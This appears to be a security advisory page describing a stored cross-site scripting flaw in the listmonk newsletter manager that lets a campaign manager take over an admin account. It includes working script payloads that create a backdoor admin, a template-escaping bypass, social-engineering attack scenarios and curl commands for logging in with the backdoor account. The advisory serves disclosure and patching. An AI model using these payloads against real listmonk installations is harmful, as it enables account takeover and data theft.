GHSA-jmr4-p576-v565
Suggest an improvement- Source
- https://github.com/advisories/GHSA-jmr4-p576-v565
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-jmr4-p576-v565/GHSA-jmr4-p576-v565.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-jmr4-p576-v565
- Aliases
- Published
- 2026-01-02T23:04:15Z
- Modified
- 2026-01-12T18:11:10.248518Z
- Severity
-
- 5.4 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P CVSS Calculator
- Summary
- listmonk Vulnerable to Stored XSS Leading to Admin Account Takeover
- Details
-
Security Advisory: Stored XSS Leading to Admin Account Takeover
Affected Versions: ≤ 5.1.0
Vulnerability Type: CWE-79: Stored Cross-Site Scripting
Summary
A lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts.
The attack can be weaponized via the public archive feature, where victims simply need to visit a link - no preview click required.
Required Attacker Permissions
campaigns:manage - Create/edit campaigns campaigns:get - View campaigns lists:get_all - Access lists templates:get - Access templatesNote: These are common permissions for content managers who are not full admins.
Attack Vectors
Vector 1: Raw HTML (Direct Script Tag)
<script> fetch('/api/users', { method: 'POST', headers: {'Content-Type': 'application/json'}, credentials: 'include', body: '{"username":"backdoor","email":"backdoor@evil.com","name":"Backdoor","password":"Hacked123","type":"user","status":"enabled","userRoleId":1,"user_role_id":1}' }); </script>Vector 2: Go Template
SafeFunction{{ `<script>fetch('/api/users',{method:'POST',headers:{'Content-Type':'application/json'},credentials:'include',body:'{"username":"backdoor","email":"backdoor@evil.com","name":"Backdoor","password":"Hacked123","type":"user","status":"enabled","userRoleId":1,"user_role_id":1}'});</script>` | Safe }}
Attack Scenarios
Scenario 1: Campaign Preview Attack
- Attacker creates campaign with XSS payload
- Request is made to super admin: "Please review my newsletter draft"
- Super admin opens campaign and clicks Preview
- XSS executes → Backdoor admin account created
- Attacker logs in with
backdoor/Hacked123
Scenario 2: Archive Link Attack (No Click Required)
- Attacker creates campaign with XSS payload
- Attacker enables Archive for the campaign
- Attacker shares archive link:
http://localhost:9000/archive/{uuid} - Super admin visits the link (no preview click needed!)
- XSS executes automatically → Account takeover
Proof of Concept
Step 1: Create Malicious Campaign
As lower-privileged user, create campaign with body:
<script> fetch('/api/users', { method: 'POST', headers: {'Content-Type': 'application/json'}, credentials: 'include', body: JSON.stringify({ username: 'backdoor', email: 'backdoor@evil.com', name: 'Backdoor Admin', password: 'Hacked123', type: 'user', status: 'enabled', userRoleId: 1, user_role_id: 1 }) }); </script>Step 2: Enable Archive (Optional - for link-based attack)
- Edit campaign settings
- Enable "Archive"
- Copy archive URL:
http://localhost:9000/archive/{campaign-uuid}
Step 3: Trigger Execution
Option A - Preview: - Send campaign to super admin for "review" - Super admin previews → XSS fires
Option B - Archive Link: - Share archive URL with super admin - Super admin visits link → XSS fires automatically
Step 4: Verify Takeover
# Login as backdoor admin curl -X POST "http://localhost:9000/admin/login" \ -d "username=backdoor&password=Hacked123" \ -c cookies.txt -L # Verify super admin access curl -b cookies.txt "http://localhost:9000/api/users"
Evidence Screenshots
[Screenshot 1: Lower-privileged user creating malicious campaign] <img width="1892" height="781" alt="Screenshot 2025-12-27 170259" src="https://github.com/user-attachments/assets/b9af26bf-0c5b-4667-ba9a-eea774156d0b" />
[Screenshot 2: Super admin previewing campaign] <img width="1686" height="709" alt="image" src="https://github.com/user-attachments/assets/4ca3d5ff-0cd9-4f22-bca0-e26e13c6b1c7" />
[Screenshot 3: Backdoor user successfully created] <img width="1370" height="469" alt="Screenshot 2025-12-27 170413" src="https://github.com/user-attachments/assets/18135128-f5af-4023-9aa7-8662a1405ed2" />
Impact
| Action | Possible via XSS | |--------|-----------------| | Create backdoor admin | ✅ Yes | | Export all subscribers | ✅ Yes | | Modify SMTP settings | ✅ Yes | | Delete all campaigns | ✅ Yes | | Access API keys/secrets | ✅ Yes |
Affected Components
| Component | XSS Works? | Method | |-----------|-----------|--------| | Campaign body (Raw HTML) | ✅ Yes | Direct
<script>tag | | Campaign body (Template) | ✅ Yes |{{ \` \| Safe }}` | | Template body | ✅ Yes | Both methods | | Campaign archive | ✅ Yes | Automatic execution on visit |
- Database specific
{ "nvd_published_at": "2026-01-02T21:16:03Z", "cwe_ids": [ "CWE-79" ], "github_reviewed_at": "2026-01-02T23:04:15Z", "severity": "MODERATE", "github_reviewed": true }- References
Affected packages
Go / github.com/knadh/listmonk
Package
- Name
- github.com/knadh/listmonk
- View open source insights on deps.dev
- Purl
- pkg:golang/github.com/knadh/listmonk
Go / github.com/knadh/listmonk
Package
- Name
- github.com/knadh/listmonk
- View open source insights on deps.dev
- Purl
- pkg:golang/github.com/knadh/listmonk